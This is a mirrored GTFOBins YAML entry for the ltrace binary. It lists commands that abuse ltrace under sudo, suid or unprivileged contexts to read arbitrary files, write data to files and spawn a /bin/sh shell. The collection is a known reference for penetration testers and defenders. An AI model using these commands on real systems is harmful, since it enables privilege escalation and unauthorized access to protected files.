mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-08 06:56:15 +01:00
28 lines
877 B
Plaintext
28 lines
877 B
Plaintext
---
|
|
functions:
|
|
file-read:
|
|
- binary: false
|
|
code: |-
|
|
ltrace -F /path/to/input-file /dev/null
|
|
comment: |-
|
|
The file is parsed as a configuration file and its content is shown as error messages.
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
file-write:
|
|
- code: |-
|
|
ltrace -s 999 -o /path/to/input-file ltrace -F DATA
|
|
comment: |-
|
|
The data to be written appears amid the library function call log, quoted and with special characters escaped in octal notation. The string representation will be truncated, pick a value big enough instead of `999`. More generally, any binary that executes whatever library function call passing arbitrary data can be used in place of `ltrace -F DATA`.
|
|
contexts:
|
|
sudo:
|
|
unprivileged:
|
|
shell:
|
|
- code: |-
|
|
ltrace -b -L /bin/sh
|
|
contexts:
|
|
sudo:
|
|
unprivileged:
|
|
...
|